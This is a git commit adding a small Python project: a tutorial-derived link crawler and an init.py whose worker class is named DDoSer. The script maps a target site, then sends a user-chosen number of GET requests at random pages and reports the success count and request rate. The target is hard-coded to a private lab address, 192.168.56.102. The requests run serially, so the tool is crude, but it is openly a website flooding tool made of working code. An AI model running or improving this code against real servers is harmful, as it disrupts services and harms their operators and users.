init

2026-03-06 01:56:23 +03:00 · 2020-04-19 22:53:20 +03:00
commit 6de8735eb5
3 changed files with 205 additions and 0 deletions
--- a/.gitignore
+++ b/.gitignore
@@ -0,0 +1,5 @@
+.idea/
+venv/
+.vscode/
+/data.db
+__pycache__/
--- a/init.py
+++ b/init.py
@@ -0,0 +1,83 @@
+import os
+import link_extractor
+import time
+import random
+import progressbar
+# import urllib.request as requests # urlib
+# import faster_than_requests as requests # faster_than_requests
+import requests
+from datetime import datetime
+ 
+from threading import Thread
+
+global requestCountSuccess, requestCountExecuted  # counters are assigned in the __main__ block
+# Make sure the directory that caches crawled site maps exists.
+if not os.path.exists('./maps/'):
+    os.makedirs('./maps/')
+
+
+def url_grab(full_url):
+    """Return the list of page URLs for host `full_url`, cached under ./maps/."""
+    map_path = f'./maps/{full_url}'
+    if os.path.exists(map_path):
+        # Cache hit: a previous run stored one URL per line.
+        with open(map_path, 'r') as f:
+            subUrls = f.read().splitlines()
+    else:
+        # Cache miss: crawl the host. The extractor returns a set, so build a
+        # list from it because the caller picks entries with random.choice().
+        subUrls = [link.strip() for link in link_extractor.extractor('http://' + full_url)]
+        # open(..., 'w') creates the file itself; os.mknod is not needed.
+        with open(map_path, 'w') as f:
+            for link in subUrls:
+                print(link, file=f)
+
+    print(datetime.now().strftime('[%X] ') + 'Карта сайта получена')
+    return subUrls
+
+
+class DDoSer(Thread):  # worker thread: one HTTP GET per instance
+	def __init__(self, url):
+		Thread.__init__(self)
+		self.url = url  # address this thread will request once
+		
+	def run(self):
+		"""Send one GET request to self.url and update the module-level counters."""
+		global requestCountSuccess, requestCountExecuted
+		# NOTE(review): if requests.get() raises, neither counter is updated.
+		# responce = requests.urlopen(self.url).getcode() # urlib
+		responce = requests.get(self.url).status_code
+		if responce == 200:
+			requestCountSuccess += 1
+		# Counted for every request that returned a response, whatever its status.
+		requestCountExecuted += 1
+
+
+if __name__ == '__main__':
+    # The target host is hard-coded; the interactive prompt below is disabled.
+    # url = input(datetime.now().strftime('[%x %X] ') + 'Введите адрес сайта: ')
+    url = '192.168.56.102'
+    # Load the cached site map for the host, or crawl it when no cache file exists.
+    subUrls = url_grab(url)
+    # Total number of requests to send, read from standard input.
+    requestCount = int(input(datetime.now().strftime('[%X] ') + 'Введите число запросов: '))
+    print()
+    # Counters below are updated by the worker threads through `global`.
+    startTime = time.time()   
+    requestCountExecuted = 0
+    requestCountSuccess = 0
+    # Each thread is joined right after start(), so requests run one at a time.
+    with progressbar.ProgressBar(max_value=requestCount) as bar:
+	    for i in range(requestCount):
+	    	url = random.choice(subUrls)
+	    	thread = DDoSer(url)
+	    	thread.start()
+	    	thread.join()
+	    	bar.update(requestCountExecuted)
+    # NOTE(review): the loop below spins without sleeping and never exits if a request raised.
+	    while requestCountExecuted < requestCount:
+	    	bar.update(requestCountExecuted)
+    # Summary: totals and the average number of requests per second.
+    print('\n' + datetime.now().strftime('[%X] ') + 'Всего выслано запросов: ' + str(requestCountExecuted))
+    print(datetime.now().strftime('[%X] ') + 'Успешных запросов: ' + str(requestCountSuccess))
+    print(datetime.now().strftime('[%X] ') + 'Средняя скорость: ' + str(round(requestCountExecuted/(time.time() - startTime))) + ' з/с')
--- a/link_extractor.py
+++ b/link_extractor.py
@@ -0,0 +1,117 @@
+# https://github.com/x4nth055/pythoncode-tutorials/tree/master/web-scraping/link-extractor
+
+import requests
+from urllib.request import urlparse, urljoin
+from bs4 import BeautifulSoup
+import colorama
+
+# Initialise colorama before any coloured output is printed.
+colorama.init()
+# Colour codes used when printing discovered links.
+GREEN = colorama.Fore.GREEN
+GRAY = colorama.Fore.LIGHTBLACK_EX
+RESET = colorama.Fore.RESET
+
+# Module-level result sets, filled in by get_all_website_links().
+internal_urls = set()
+external_urls = set()
+# Number of crawl() calls made so far; compared against `max_urls`.
+total_urls_visited = 0
+
+
+def is_valid(url):
+    """
+    Return True when `url` has both a scheme and a network location.
+    """
+    parts = urlparse(url)
+    return bool(parts.scheme and parts.netloc)
+
+
+def get_all_website_links(url):
+    """
+    Return the set of not-yet-seen links on page `url` that belong to the same
+    website; new links are also recorded in `internal_urls` / `external_urls`.
+    """
+    urls = set()
+    # host (and port) of the page being scanned, without the protocol
+    domain_name = urlparse(url).netloc
+    soup = BeautifulSoup(requests.get(url).content, "html.parser")
+    for a_tag in soup.findAll("a"):
+        href = a_tag.attrs.get("href")
+        if not href:  # missing or empty href attribute
+            continue
+        # resolve relative links against the page URL
+        parsed_href = urlparse(urljoin(url, href))
+        # remove URL GET parameters, URL fragments, etc.
+        href = parsed_href.scheme + "://" + parsed_href.netloc + parsed_href.path
+        if not is_valid(href):
+            # not a valid URL
+            continue
+        if href in internal_urls:
+            # already in the set
+            continue
+        # Compare hosts rather than searching the whole URL, so an external
+        # link that merely mentions our domain in its path is not followed.
+        host = parsed_href.netloc
+        if host != domain_name and not host.endswith("." + domain_name):
+            if href not in external_urls:
+                print(f"{GRAY}[!] External link: {href}{RESET}")
+                external_urls.add(href)
+            continue
+        print(f"{GREEN}{href}{RESET}")
+        urls.add(href)
+        internal_urls.add(href)
+    return urls
+
+
+def crawl(url, max_urls=50):
+    """
+    Recursively crawls `url`, following the internal links found on each page.
+    Results accumulate in the `external_urls` and `internal_urls` global set variables.
+    params:
+        max_urls (int): links stop being followed once the global visit counter exceeds this, default is 50.
+    """
+    global total_urls_visited
+    total_urls_visited += 1
+    links = get_all_website_links(url)
+    for link in links:
+        if total_urls_visited > max_urls:
+            break
+        crawl(link, max_urls=max_urls)
+
+
+def extractor(url):
+    """Crawl `url` with the default limit and return the global `internal_urls` set."""
+    crawl(url)
+    # The crawl fills `internal_urls` in place; the same set object is returned.
+    return internal_urls
+
+
+if __name__ == "__main__":
+    # Command-line entry point: crawl one site and save its links to text files.
+    import argparse
+    parser = argparse.ArgumentParser(description="Link Extractor Tool with Python")
+    parser.add_argument("url", help="The URL to extract links from.")
+    parser.add_argument("-m", "--max-urls", help="Number of max URLs to crawl, default is 30.", default=30, type=int)
+    # NOTE: the command-line default (30) differs from crawl()'s own default of 50.
+    args = parser.parse_args()
+    url = args.url
+    max_urls = args.max_urls
+
+    crawl(url, max_urls=max_urls)
+
+    print("[+] Total Internal links:", len(internal_urls))
+    print("[+] Total External links:", len(external_urls))
+    print("[+] Total URLs:", len(external_urls) + len(internal_urls))
+
+    domain_name = urlparse(url).netloc
+
+    # save the internal links to a file named after the crawled host
+    with open(f"{domain_name}_internal_links.txt", "w") as f:
+        for internal_link in internal_urls:
+            print(internal_link.strip(), file=f)
+
+    # save the external links to a file named after the crawled host
+    with open(f"{domain_name}_external_links.txt", "w") as f:
+        for external_link in external_urls:
+            print(external_link.strip(), file=f)